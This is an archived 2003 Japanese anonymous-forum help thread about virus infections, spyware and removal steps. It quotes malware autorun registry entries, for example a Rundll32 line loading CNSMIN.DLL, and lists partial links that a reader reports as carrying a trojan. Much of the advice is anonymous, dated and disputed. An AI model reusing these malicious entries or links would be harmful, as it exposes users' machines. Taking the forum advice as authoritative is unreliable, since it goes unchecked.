>>604
だから、どうすればいいんだって。

609 :名無しさん@お腹いっぱい。:03/12/06 23:50
ウイルスを駆除すればいいんじゃない?

610 :名無しさん@お腹いっぱい。:03/12/07 00:47
どうやって駆除するか分からないのか?
ウィルス駆除ソフト買って来い

611 :名無しさん@お腹いっぱい。 :03/12/07 01:25
さっき、いつも覗いてるサイトのトップページを開いたら、いきなり
ウイルスバスターが作動して「ウイルスを隔離しました」というメッセージが
表示されました。
これってそのサイトが感染してるってことなんでしょうか? その人にその事を
伝えた方がいいのかな・・・。

ちなみに、VBS_REDL という感じの名前でした。

612 :名無しさん@お腹いっぱい。:03/12/07 01:46
>>611
正しいウィルス名か、サイトのURLでもわからんと、なんとも言えん。誤検出の可能性だってあるだろうし。

613 :名無しさん@お腹いっぱい。:03/12/07 02:25
>>611
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=redlof&alt=redlof

このうちのどれかだろうけど、まあよく聞くVBS_REDLOF.Aだろうな。

その感染したページのソースを見ると、HTMLの最後のあたりに
意味不明な文字(コード)が大量についてるはず。それがウイルス。

Windows UpdateでIEのセキュリティパッチもあててなくて、更に
ウイルス対策製品も持ってないんだろうな>そのサイトの運営者

614 :名無しさん@お腹いっぱい。:03/12/07 14:00
ここんとこport 99を何回か叩かれてるんですが、
新手のウィルスかなんかですかね?

615 : :03/12/07 14:26
最近PCを立ち上げるたびに
「C:\winnt\system32\・・・\hiddenrun.exeが見つかりませんでした」
というエラーアラートが出るようになったんです。
で、気になって調べたら
レジストリの
HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\Run に

Application=C:\winnt\system32\rmtcfg\files\hiddenrun.exe mdll.exe
Drive Interface=c:\winnt\system32\ias\hiddenrun.exe c:\winnt\system32\ias\mclll.exe

というような値が入っていたんですが
mdll.exe、hiddenrun.exeって
きっと何かしら悪さをするアプリですよね??
値を無効にしたほうがいいのでしょうか??

616 :名無しさん@お腹いっぱい。:03/12/07 14:54
>>615
やられたな。
今から無効にしても他にもやられてるかもな

617 :名無しさん@お腹いっぱい。:03/12/07 15:02
BKDR_DMSPAMMERAとWARM_RANDEXFに感染したみたいなんですが、
これはどんな被害を及ぼすのですか

618 :名無しさん@お腹いっぱい。:03/12/07 15:16
>>615
IRC_SERVU.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=IRC_SERVU.A&VSect=T
HIDDEN32.EXE=HIDDENRUN.EXE


619 : :03/12/07 15:27
>>616
>>618
返信ありがとうございます。
やっぱりやられてますかねぇ(;_;)
あとこれと関係あるかわからないですが
マイコンピュータを何気なく開いたらLANでもないのに
'218.165.1.120'のc$ (P:)  ネットワークドライブ
が見えていました。家のIPとはまったくの無関係です。
(このアドレスはAsia Pacific Network Information Centre)
切断すると消えるのですがネット接続すると少しするとまた現れます。

もう、ハードディスク全部消して再インストールしたほうが
無難でしょうか??
また今後の対策としてパーソナルファイヤーウォール系(ノートンとか)
入れたほうがよいでしょうか?

620 :名無しさん@お腹いっぱい。:03/12/07 15:32
ファイヤーウォール入れてないのかよ!
入れろよ。
俺ならクリーンインストールする

と621が言ってました

621 : :03/12/07 15:36
>>620
アンチウィルスしか入れてませんでした。
不覚です。

622 :名無しさん@お腹いっぱい。:03/12/07 16:29
すまんです。
tracking cookieって、どんな悪さをするんですか?
悪性とも限らないんでしょうか?

623 :名無しさん@お腹いっぱい。:03/12/08 00:36
POSSIBLE BROWSER HIJACK ATTEMPTというウイルスに感染しました。
アドウェアなどで削除しても、次にPCを起動したときには、
またこのウイルスは作動してしまいます。
他にも何か起動しているのでしょうか?
これを完全に削除するにはどうしたらいいでしょうか?
システムの復元をするしかないのでしょうか?

624 :名無しさん@お腹いっぱい。:03/12/08 00:57
omepage3.nifty.com/ktsn/AHO.html
2.strangeworld.org/uedakana/sahra7438.jpg
pld.otonabbs.com/sum.html?1/test/img/1053749327424536.jpg
pld.otonabbs.com/sum.html?1/test/img/1053749327424536.jpg

こんな感じのリンクを2chブラウザの画像プレビューで読み込んでしまいました。
sahra7438.jpgがノートン先生にひっかかり、「Js.Trojan.WindowBomb」の
警告が出ました。

ブラクラっぽいので気にしてなかったのですが、問題はその後で、
フレッツISDNのダイアルアップ接続が、5分〜45分ほどの間に
頻繁に切断されるようになりました。(ログには「#41 一時的障害」の表示)

ググッてみたら、NTTの交換機の障害の可能性との記述とあったのですが、
ウイルスの可能性はあるのでしょうか?
ISDNルータの接続を切断する、ウイルスとかトロイといったものはありますか?
教えてエロイ人!
#今日思わず、プロバイダとNTTに問い合わせてしまいました…。

625 :名無しさん@お腹いっぱい。:03/12/08 11:55
>>621
トレンドのデータベースで検索してみれ。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_WINDOWBOMB.E
「特に感染マシン上でファイルコピーやレジストリ改変などの
システム改変は行いません。」(シマンテックのDBは「ノートン
使え」というだけで情報がしょぼい)つまり単純に削除でOK
ということ。

ノートンが他に警告出さないなら、ISDNが切れるのは回線障害
の可能性が高いだろ。心配ならトレンドのオンラインスキャンも
して味噌。あとSpybot、Ad-awareなどのアンチスパイも入れて
おく。

626 :名無しさん@お腹いっぱい。:03/12/08 15:02
ノートンアンチウィルスを常時してたのに何か謎の
ウィルスに感染したらしく、常時ソフトやソフトの起動が
全くできなくなったんですが・・・



627 :626 :03/12/08 15:03
ウィルスらしきものに感染した時に
システムが停止して、再起動されました。

628 :624:03/12/08 22:43
>>625
微妙にレス番が違う気がするけど、レスサンキューです。
やっぱり回線障害の可能性が高いでしょうか。
2日前までは全く問題が無かっただけに、ちょっと心配しすぎました。
オンラインスキャン早速試してみますね。
スキャン中に回線が切れませんように(;´Д`)

629 :名無しさん@お腹いっぱい。:03/12/08 22:44
すみません。POLYBOOT−Bに感染してしまったのですが、駆除方法を
いくら見てもさっぱりわかりません。なんとか駆除したいんですが怖くて・・・

どなたかすみませんが方法を教えてください。当方Windows98 NEC valuestar
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=1045&submit2=ID%8C%9F%8D%F5
・・・・ここまで見たんですがまるでわかりませんでした。起動用ディスクまでは準備しましたが。

630 :名無しさん@お腹いっぱい。:03/12/09 02:00
>>629
感染マシンを起動し、「ウイルスバスター」のインストール用CD-ROM内の「Tools」フォルダに含まれる
「vbscan_at.exe」を実行してください。

*CD-ROMをセットして、「Tools」フォルダに含まれる「vbscan_at.exe」をダブルクリックする。
そうすると、自動的に必要なファイルがC:\vbフォルダに解凍されます。

MS-DOS起動フロッピーディスクをセットして、パソコンの電源を入れる。
そうすると、フロッピーディスクからブートして、MS-DOSが立ち上がるから以下のコマンドを入力する。
ブートしないときは、BIOSの設定画面を出して、フロッピーディスクドライブの起動順位を、一番上に持ってくる。

*上で解凍したプログラムを、MS-DOS上で実行する。

A:\>C:           対象ドライブをC:\に移動
C:\>CD VB         フォルダをC:\VBに移動
C:\VB>VBSCAN /P      VBSCAN.EXEを /P 起動オプション付きで実行


631 :名無しさん@お腹いっぱい。:03/12/09 09:20
教えてください
メモ帳がなくなったりインターネットオプションが開かなくなったり
オンラインスキャンもできなかったり更にはスキャンディスクもできないウイルスってありますか?

632 :名無しさん@お腹いっぱい。:03/12/09 09:44
>>631
レジストリを改変するウイルスかも…
とりあえずオンラインウイルススキャンしてみて。
http://www.symantec.com/region/jp/securitycheck/index.html
http://www.trendmicro.co.jp/hcall/index.asp


633 :名無しさん@お腹いっぱい。:03/12/09 10:36
>>632
オンラインスキャンできないって書いてあるべ…

>>631
メモ帳が開かないというのはファイルがないのかそれともファイルは存在してるけど
起動できないのか?

634 :631:03/12/09 10:39
ウイルススキャンがアクティブXコントロールが効かないのでできないです(っ_・)
インターネットオプションすら開けないので・・
ノートンシステムワークスはもってるんだけど怠けてインストール忘れてた
今そのPCは電源切ったところやっぱり起動しません・・・
今もう一台で書き込み中

635 :631:03/12/09 10:55
メモ帳が開かない→参照になるので消えてしまったんだと思います。
アクセサリ→メモ帳でも参照になります。


636 :名無しさん@お腹いっぱい。:03/12/09 11:02
>>635
こんなの見つけたが…
https://www.netsecurity.ne.jp/article/8/4046.html


637 :635:03/12/09 11:43
それかも
やっちまった・・・・
最悪の部類ぽい
どうりでシステムのDLLが壊れると思った・・・・・・

638 :名無しさん@お腹いっぱい。:03/12/09 11:53
エイメソ

639 :名無しさん@お腹いっぱい:03/12/09 13:13
ウイルスメールが着たんですが、どうすればいいですか?
ページを表示するだけで感染するってのもあるし・・
送信者がDavidで、件名がSubuject1 ggqbtってのなんですが・・
重要のマークがついてます。
どう処理すればいいですか?怖くてうかつに触れません。
どなたか教えてください。

640 :名無しさん@お腹いっぱい。:03/12/09 13:34
>>639 開かず削除。

641 :639:03/12/09 13:56
早とちりでした。
お騒がせしてすいません。

642 :名無しさん@お腹いっぱい。:03/12/09 16:50
本当に初心者で申し訳ないのですが、エロサイトでJS.exception.exploitっちゅうのに感染したってノートン君が出てきました。
2時間もかけて二つのオンラインスキャンをしてみましたが、何も検出されませんって出ました。
ほっておいて良いのでしょうか?


643 :名無しさん@お腹いっぱい。:03/12/09 17:50
感染じゃなくて、ブロックとか検疫だったとかいうオチじゃないよね?

644 :名無しさん@お腹いっぱい。:03/12/09 17:55
正直、質問の意味も分かりません。それはどうすれば調べられますか?
スキャンして見つからなくても、ウイルスの可能性はあるんでしょうか?

645 :名無しさん@お腹いっぱい。:03/12/09 18:03
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html

へぇー

646 :名無しさん@お腹いっぱい。:03/12/09 18:04
Panasonic hi-ho、自宅訪問してPCのウイルス診断などを行なうサービス

http://bb.watch.impress.co.jp/cda/news/3528.html

647 :名無しさん@お腹いっぱい。:03/12/09 19:08
誰か、軽いアンチウイルス・ソフトを紹介して
軽くて、確実にウイルスを検地できて
新しいウイルスに対しても対応が早いやつ、お願い!!

648 :名無しさん@お腹いっぱい。:03/12/09 19:15
藪さんこんばんは


649 :名無しさん@お腹いっぱい。:03/12/09 20:11
>>647
マルチかよ

650 :名無しさん@お腹いっぱい。:03/12/10 01:38
>>639
>>605
うちのところにも来たのだが,
昨日きたのは
件名が、 subject 3 nehgpxp で、送信者が、 Andrew 添付ファイルが、 file.zip
今日来たのが
件名が、 subject 1 eyej で、送信者が、 Michael 添付ファイルが、 file.zip
おお、アンドリューにマイコーか、って全然しらねーよ!即削除!
ウイルスバスターにも引っかからないし、
MIMAILの亜種だと思うが、新種か。

651 :名無しさん@お腹いっぱい。:03/12/10 02:05
>>650
うちにもまったく同じのがきた。
オンラインスキャンかけても引っかからない。

652 :名無しさん@お腹いっぱい。:03/12/11 19:44
こないだから3回ほど、lzhとzipの添付ファイルが一個づつ付いたメールが来る。
ノートンに引っかからない。これ何だろうね?
本文なし、Subjectは忘れちゃったよ。


653 :名無しさん@お腹いっぱい。:03/12/11 22:21
初めてカキコミさせていただきます。
最近友人のパソコンで「文字化け」「ウィンドウがガンガン出てくる」「アウトルックが勝手に起動される」
「キーボードの設定が勝手に変わっている」などの異常が起こるようになってしまいました。
原因は良く解っていないのですが、これってウィルスなんでしょうか?
友人はノートンの最新定義で検疫したと言っていたのですが…。
御存知の方がいらっしゃいましたら、よろしくご教授ください。

654 :名無しさん@お腹いっぱい。:03/12/11 23:24
HD内に「folder.htt」というファイルが増殖するのですが、これはウィルスが原因でしょうか?

655 :名無しさん@お腹いっぱい。:03/12/11 23:33
ええ、間違いなく

656 :名無しさん@お腹いっぱい。:03/12/11 23:39
どういったウィルスにやられているのでしょうか?
また、対処法はありますか?

657 :名無しさん@お腹いっぱい。:03/12/11 23:45
ググれ馬鹿珍
http://www.google.co.jp/search?num=100&hl=ja&lr=lang_ja&q=folder%2Ehtt

658 :654:03/12/11 23:53
すみません、調べてもよく意味が分かりません。
放っておくとヤバいですか?

659 :名無しさん@お腹いっぱい。:03/12/11 23:58
たかだか8分でちゃんと調べたって言えるのかぁ?

660 :名無しさん@お腹いっぱい。:03/12/12 00:05
すみません。質問なんですが、誰かが会社のPCでネットしていたらしく
ウィルスが入ってきました。
とりあえず、無料のアンチウィルスソフトで治療したのですが、ネットに
繋ぎっぱなしにしていると定期的に(9時きっかり)エロサイトが開いてしまいます。
これってどうやって直していいんでしょうか?
PC初心者ばかりな為、具体的な対処法が皆わかりません。
お願いします。


661 :名無しさん@お腹いっぱい。:03/12/12 00:10
>>660
バスターかノートン買いなさい。

662 :654:03/12/12 00:12
どれを調べても、意味が分かりそうもないので助けて欲しいです。
少しアドバイスをいただければと思うのですが。

663 :660:03/12/12 00:21
>>661
それが1番いいんですかね?無料じゃ対処できないってことですか。
でも個人のPCなら問題ないんですが、会社のPCの為、面倒な手順を
色々としなければならなく、その部署の責任者である私が何かしらの罰を
受けてしまうためにここに相談しに来たんですが・・・。


664 :名無しさん@お腹いっぱい。:03/12/12 00:43
>>663
企業で業務に使用しているPCにアンチウイルス入れてなくて、ウイルスに
感染して得意先に迷惑かけたら信用問題でしょ。
そんな事が起こったら、責任者の藻前が責任取ることになるよ。

エロサイトが勝手に開くのはPC初心者板に専用スレがあるから、そっちで聞くといい。
・エロサイト見たら・・・助けてください!
http://pc.2ch.net/pcqa/

665 :名無しさん@お腹いっぱい。:03/12/12 00:44
ウィルスの名前くらい出してくれ。
駆除したんならわかるべ。

666 :660:03/12/12 00:53
>>664
ありがとうございます。
そうなんです。確かに信用問題に繋がってしまいますから、現在は
修復するために使用していない状況です。

一応そっちのスレに聞いてみます。ありがとうございます。

>>665
ウィルスの駆除をしたのは私がいないときにしてしまった為、確認が
取れていません。すみません。情報不足で・・・。

667 :名無しさん@お腹いっぱい。:03/12/12 01:34
質問させて下さい。
OSはWindows98なんですが、突然ブラウザを閉じる際のマーク“×”
とかが“r”とか数字の“6”になっています。
ノートンでは反応無しだったんですが、コレって何なんでしょうか?
ご存知の方がおられましたら、ご回答のほど宜しくお願いいたします。

668 :名無しさん@お腹いっぱい。:03/12/12 01:37
>>667
http://www.google.com/search?lr=lang_ja&q=%95%C2%82%B6%82%E9%81%40%8D%C5%91%E5%89%BB%81%40%8D%C5%8F%AC%89%BB

669 :名無しさん@お腹いっぱい。:03/12/12 01:44
お願いですどなたか教えてください。
最近My Documentsの中に保存してあるワードの文書の
コピー(?)みたいな

WRLなんとか.tmp

というのが以上に多いのですが、これウイルスですよね??
どうすればいいのでしょうか。
私PCが全く初心者な高校生で何も分かりません。
ウイルスかどうかなのだけでも教えていただけないでしょうか。
お願いします。


670 :667:03/12/12 01:57
≫668様
早速のご回答有難うございます。
会社のPCですので明日、早速実行してみたいとお思います。
有難うございましたm(__)mペコリ

671 :名無しさん@お腹いっぱい。:03/12/12 10:52
夕べ、ネット中に突然IEのブラウザが無数にたちあがりだしました。
すごいスピードでウィンドウが乱立するんです。
ウイルスだーっと思い、全部スキャンかけたんですが何も検出されません。
これってウイルスでなくただのエラーでしょうか?
怖くて家でネットできません(泣)
いつも行っている友人のサイトを見ていただけで、
ブラクラというわけでもないと思います。。。

672 :名無しさん@お腹いっぱい。:03/12/12 13:33
>>669
ワードの一時ファイル。

673 :名無しさん@お腹いっぱい。:03/12/12 14:08
>>671
それだけならまずブラクラくさいがな・・・
ブラクラチェックしてくれる所もある。(ぐぐれよ)
友人のHPがいたずらされている恐れもあるぞ。

開いた窓が広告だったらスパイウエア(アドウエア)の可能性があるな。
PFWとスパイウエア駆除ソフトは入れているのかい?
フリーでも有料でもいいから入れろよ。
そのための参考スレはここネット関係にイパーイある。
スパイウエア駆除ソフトはspybotが一応お勧め。
PFWはいっぱいあるが、どれも一長一短がある。
とりあえずなら、ZoneAlarmがいい。(英語だ。バージョンによっては日本語化できる)
後、ここが参考になるかもナ。
ttp://higaitaisaku.web.infoseek.co.jp/menu5.html

ジョークソフトというのもある。(その名の通り)

ハッキング→いたずらの可能性もある。

情報が足りないよ。もっと書け。

674 :671:03/12/12 17:31
>>673
ありがとうございます。
いろいろ調べてみたんですが、状況的にはブラクラっぽいですよね…
原因は謎ですが、とりあえずチェッカー入れてみました。
スパイウェアの方もDLしてみようと思います。

675 :名無しさん@お腹いっぱい。:03/12/12 17:45
パソコンを立ち上げるたびにhttp://www.idgsearch.com/Diet+Pills.html
http://www.idgsearch.com/Party+Poker.htmlのショートカットがさくせいされ
エクスプローラのホームページがかきかえれれてしまいます。
また知らないアドレスがお気に入りに追加されます。
どうしたらいいでしょうか。

676 :名無しさん@お腹いっぱい。:03/12/12 17:51
http://www.symantec.com/region/jp/sarcj/data/t/trojan.digits.html
http://www.spywareinfo.com/~merijn/cwschronicles.html
アチャー

677 :名無しさん@お腹いっぱい。:03/12/12 18:27
ありがとうございます。
ウイルスなんですね。
対策ソフトで検索できますか?

678 :名無しさん@お腹いっぱい。:03/12/12 19:45
>>672
あ、そうなんですか!
ありがとうございました・・!ホッとしました。
それなら消しても大丈夫ですよね。全部削除します。


679 :名無しさん@お腹いっぱい。:03/12/12 21:36
毎日Klezを送ってきます。
全然知らないアドレスです。
こちらからメールすると、私のアドレスを
知られてしまうので連絡したくありません。
どうしたらいいでしょうか。

680 :名無しさん@お腹いっぱい。:03/12/12 21:56
プロバイダに連絡汁。

681 :名無しさん@お腹いっぱい。:03/12/12 23:23
>680
いまプロバイダにメールしました。
「そちらのプロバイダを利用してる人から
ウィルスメールが来て迷惑してます」って。
でも、この人のアドレスから送信されていても
この人が犯人とは限らないんですよね…。
なんで感染したままで平気な人がいるのか不思議です。
プロバイダには連絡しましたが、これできちんと
連絡が行ってなんとかなるものなのでしょうか?
とにかく今日はひとつ勉強になりました。
680さんありがとうございました。

682 :名無しさん@お腹いっぱい。:03/12/13 00:49
すいません、Invalid TCP Source Portとは何でしょうか?
三日に一度、こういったアタックが来るのですが・・

683 :名無しさん@お腹いっぱい。:03/12/13 04:27
>>682
これだろ。
http://service1.symantec.com/support/INTER/entsecurityjapanesekb.nsf/jp_docid/20031009200528949?OpenDocument&dtype=corp
> これらの攻撃によってシステムがダメージを受ける可能性はほとんどありません。
> このシグネチャでは、送信元ポートが 0 番の TCP パケットを検出します。
> ポート 0 番は、TCP の発信元ポートとして通常は使用されません。

684 :名無しさん@お腹いっぱい。:03/12/13 05:05
ついさきほど気づいたのですが、
PC内のすべてのテキストファイルが、参照すると
■■■■(←これの半角の文字)になってしまいます。

全角文字だけが、全てこのようになってしまうようです。
テキストエディタで、日本語変換して確定した時点で■■■■
になってしまいます。

ただし、その■■■■をこの投稿欄にコピペすると、正しく表示されます。

ウイルスでしょうか?
ご存知の方、いらっしゃいましたら教えてください。

685 :名無しさん@お腹いっぱい。:03/12/13 05:59
>>684
テキストのフォントをいじったんじゃないの?

686 :名無しさん@お腹いっぱい。:03/12/13 06:58
>685
レスありがとうございます。

フォントファイル自体を消してしまった可能性ということでしょうか。
それとも、テキストファイルのフォントを指定するという設定項目
というものはありましたっけ?
探してみます。

書き忘れていましたが WINDOWS-2000 + SP4 です。


687 :名無しさん@お腹いっぱい。:03/12/13 07:09
画面のプロパティ−[デザイン]を見たのですが、
ここでは変えられませんでした。
よろしければどこで変えるのか教えてください。


688 :名無しさん@お腹いっぱい。:03/12/13 08:39
>>687
セーフモード試してみな。

というかウイルス関係なさそうなので、PC初心者板へどうぞ。

PC初心者
http://pc2.2ch.net/pcqa/

689 :ところてん:03/12/13 18:55
質問させていただきます。
ウイルスを実行してしまったようなので、上のほうで紹介されていたオンラインのチェッカーでしらべたところ、
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_WINUR.C

とでました。WORM_WINUR.Cという名前だとあったのですが、ほかのページを調べても、あまり検索できませんでした。

調べたサイトはTrend Micro ウイルス情報なのですが、あわせてSymantec Security Responseでやってみると、何もひっかかりませんでした。

それで、とりあえず、一方でひっかかったので、削除できるのかなあと、
削除方法に従って、レジストリ???をみたのですが、

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値:Windir = "C:\windows\winrun.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値:Sysdir = "C:\winnt\winrun.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
値:winrun = "C:\windows\winrun.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
値:winur = "C:\winnt\winrun.exe"

これらが出てきません。というか、見つけられていないだけなのかもしれません・・・
どなたかどう試せばよいか教えていただけないでしょうか。OSはme です。




690 :名無しさん@お腹いっぱい。:03/12/13 19:17
ウイルスにHDDの一部のデータが消されてしまいました。
それで「復元」というソフトをつかって、復元しようとおもったのですが
どれをどこに復元すればいいかわからないのがほとんどです。
何か復元方法はありますか?

691 :名無しさん@お腹いっぱい。:03/12/13 19:19
何か復元方法はありますか? →何か良い復元方法はありませんかね?


692 :マルチ:03/12/13 19:22
 

693 :ところてん:03/12/13 19:26
>>689

すいません。Symantec Security Responseでやってもウイルスとでました。
でも、あいかわらず削除方法がわからないのですが(泣)

694 :名無しさん@お腹いっぱい。:03/12/13 20:12
>>689
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

この2つのキーを 『レジストリ ファイルの書き出し』 して、内容を晒してみそ。

695 :名無しさん@お腹いっぱい。:03/12/13 20:37
>>689
C:\windows\winrun.exe
それで、このプログラムはあったの?
デフォルトでは無いもんなんだが!

696 :名無しさん@お腹いっぱい。 :03/12/13 21:06
すいません。この度OSがウィンドウズ2000proなのですが
起動してパスワード入力までして そこまでは問題なにのですが
その後レジストリの読み込みエラー 復元不可能なエラーがでました
みたいな エラーが出て全てでは無く一部分以外が立ち上がらなく
なってしまいました。
リカバリーディスクも無く アウトルックの中身も
見れなくなり困っています。

なにか良い復元方法は無いものでしょうか?

もし宜しければご回答お願いいたします



697 :名無しさん@お腹いっぱい。:03/12/13 21:08
うーむ、日本語が・・・

698 :ところてん:03/12/13 23:03
>>694

ありがとうございます。
レジストリの書き出しってどうやるんですか?
保存場所とかでてきたのですが・・・

あほですいません。。。

僕がやったのは
レジストリエディタをファイル実行でだしてきました。
そうすると、メニューバーのところにレジストリというのがあるので
そこをクリックすると、レジストリファイルの書き込みというのがでてきますよね?

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

そこからどうしたらいいのでしょうか???



699 :ところてん:03/12/13 23:18
あ、すいません。いみがわかりました・・・
一個目の 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="ctfmon.exe"



700 :ところてん:03/12/13 23:19
二個目のHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runが

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run]
"ScanRegistry"="C:\\WINDOWS\\scanregw.exe /autorun"
"TaskMonitor"="C:\\WINDOWS\\taskmon.exe"
"PCHealth"="C:\\WINDOWS\\PCHealth\\Support\\PCHSchd.exe -s"
"SystemTray"="SysTray.Exe"
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"CPQEASYACC"="C:\\Program Files\\Compaq\\Easy Access Button Support\\cpqeadm.exe"
"EACLEAN"="C:\\Program Files\\Compaq\\Easy Access Button Support\\eaclean.exe"
"Digital Dashboard"="C:\\Program Files\\Compaq\\Digital Dashboard\\DevGulp.exe"
"Watch Dog Program"=""
"Hidserv"="Hidserv.exe run"
"OEMCLEANUP"="C:\\WINDOWS\\OPTIONS\\oemreset.exe /o"
"WinampAgent"="\"C:\\Program Files\\Winamp3\\winampa.exe\""


701 :ところてん:03/12/13 23:19
二個目の続きです。
"QuickTime Task"="\"C:\\WINDOWS\\SYSTEM\\QTTASK.EXE\" -atboottime"
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"CnsMin"="Rundll32.exe C:\\WINDOWS\\DOWNLO~1\\CNSMIN.DLL,Rundll32"
"mps"="C:\\WINDOWS\\SYSTEM\\mps.exe /s"
"MPTBox"="C:\\Program Files\\Canon\\MultiPASS4\\MPTBox.exe"
"LoadQM"="loadqm.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\OptionalComponents\MSFS]
"Installed"="1"
です。


702 :名無しさん@お腹いっぱい。:03/12/13 23:36
>"CnsMin"="Rundll32.exe C:\\WINDOWS\\DOWNLO~1\\CNSMIN.DLL,Rundll32"
あ。

703 :ところてん:03/12/13 23:39
>>702

私への返信をしていただいてるんですよね?
>>701の3行目

"CnsMin"="Rundll32.exe C:\\WINDOWS\\DOWNLO~1\\CNSMIN.DLL,Rundll32"

これがアカンということでしょうか。

704 :名無しさん@お腹いっぱい。:03/12/13 23:45
>>703
ttp://higaitaisaku.web.infoseek.co.jp/removecnsmin.html
ここ見て、がんばって駆除してくれ。

705 :名無しさん@お腹いっぱい。:03/12/14 01:18
ちょっと質問させてください。昨日からタスクバーに
黄色のメールマーク形で中から血?が流れているようなアイコンが
ありまして…ポイントしても右クリックしても何にも反応しないんですが
これはウイルスだと考えて差し支えないのでしょうか?

念のためトレンドマイクロのオンラインスキャンにもかけてみたんですが
ウイルスだとは検知されませんでした。タスクバーのプロパティを開いてみると
<タイトルなし>と表示されています。

706 :705:03/12/14 02:15
自己解決しました…それにしてもあまりにも間抜けです。
何の事はない、ウイルスセキュリティ2004のメールチェック機能のマークでした。

しかし、黄色地にK7(開発元の「K7コンピューティング」のK7か?)と
赤文字で書いてあるアイコンはちょっと不気味…。
せめて右クリックとかダブルクリックした時くらいは反応してくれ…。

707 :名無しさん@お腹いっぱい。:03/12/14 05:52
概出のウィルスなんですがHTML_SUAR.Aというのに感染しました。
AVG Free Editionを使ってみたのですが認識しないようです。
どうすれば駆除出来るのでしょうか?

708 :名無しさん@お腹いっぱい。:03/12/14 10:07
シマンテック、トレンドマイクロのWebで調べて駆除する。

709 :あるPC修理者:03/12/14 23:01
あのぉ〜・・・
WIN2Kで管理者パスワード無効にする方法ってNTFSを読めるソフトを落としてくればできるんですけど・・・。
FATだったらDOSプロンプトでもできます。
ただ、それって多分ほとんどの人が知らないからこういう場所で言ってよいのかどうか・・・
管理人さんが、投稿後24時間以内に削除してくれる確約があれば公表してもよいですが・・・。
っていうか、最終投稿が11月12日で1ヶ月も前だから誰も読まないか・・・

710 :名無しさん@お腹いっぱい。:03/12/14 23:07
(゚д゚)ハァ?

711 :あるPC修理者:03/12/14 23:07
あれ????????????
ぜんぜん違うところに投稿されてる・・・???
ごめんなさい、無視ってください。

712 :名無しさん@お腹いっぱい。:03/12/14 23:16
>>709 >>711
何かの亡霊が出たか?と一瞬焦ったなり。

713 :薮パソユーザー ◆0fQkHdNop2 :03/12/15 11:35
>>707

HTML_SUAR.Aは広義のウィルスですがブラウザークラッシャーの一種なので
悪質HPを見た時点で悪さをするだけです。駆除の必要はないですが気持ち
悪いなら手動で削除してください。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

714 :名無しさん@お腹いっぱい。:03/12/15 12:25
>>707
アンチドートもお勧めです

715 :名無しさん@お腹いっぱい。:03/12/15 18:42
>>713
じゃぁ気持ち悪いので薮パソユーザー ◆0fQkHdNop2を
NGワードに入れて削除します。

716 :名無しさん@お腹いっぱい。:03/12/15 22:44
W32.Pinfiというウイルスに感染していたので、ノートンで修復したのですが
「bfq1EC.temp」というこのウイルスに感染したファイルだけは
修復も検疫も出来ませんでした。

そこでこのファイルは削除してしまおうと思ったのですが、このファイルは
削除しても大丈夫なのでしょうか?

717 :名無しさん@お腹いっぱい。:03/12/16 02:47
薮パソユーザー ◆0fQkHdNop2さん
あなたはマイクロソフトの技術情報をあげて虚偽を指摘されても
http://pc.2ch.net/test/read.cgi/sec/1068471471/102 取り消そうとしないばかりか、
http://pc.2ch.net/test/read.cgi/sec/1068471471/110

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いて逆に指摘者を誹謗していますね。上記はあなたが広めた虚、暴言
のほんの一例です。「Outpostファイアウォールはデフォールトでブラスタに無効」など
実害のあるデマは数えればきりがありません。初心者部外者も多い質問板の性質上放置
できません。虚偽の取り消しと暴言の謝罪をお願いします。

以上、何度かお願いしてまいりましたが、まだ回答をいただいておりません。

718 :名無しさん@お腹いっぱい。:03/12/16 14:06
アウポスレで書けヴァカ

719 :名無しさん@お腹いっぱい。:03/12/17 02:33
>>718 
ま、そのテンプレちょっと古い。しかし藪パソが口から
デマカセ撒きちらして、指摘されても強情張って訂正
せず、質問者にも回答者にもが迷惑なヤシだということ
は事実。ここらで藪を擁護するのは藪しかおらん。お前を
藪パソのジエンと認定する。






720 :名無しさん@お腹いっぱい。:03/12/19 01:18
Windows Updateの不具合のことなんだけど、MSサイトでは解消したと
書かれているが、おれんとこまだだめだよ。
そんなヤツいない?


721 :名無しさん@お腹いっぱい。:03/12/19 01:26
>>720
WIN板のWindows updateスレへどぞー。

722 :質問:03/12/19 11:49
質問です。
パソコンをしているときに、色々な場面で勝手にダイヤルアップIP接続
をはじめてしまいます。
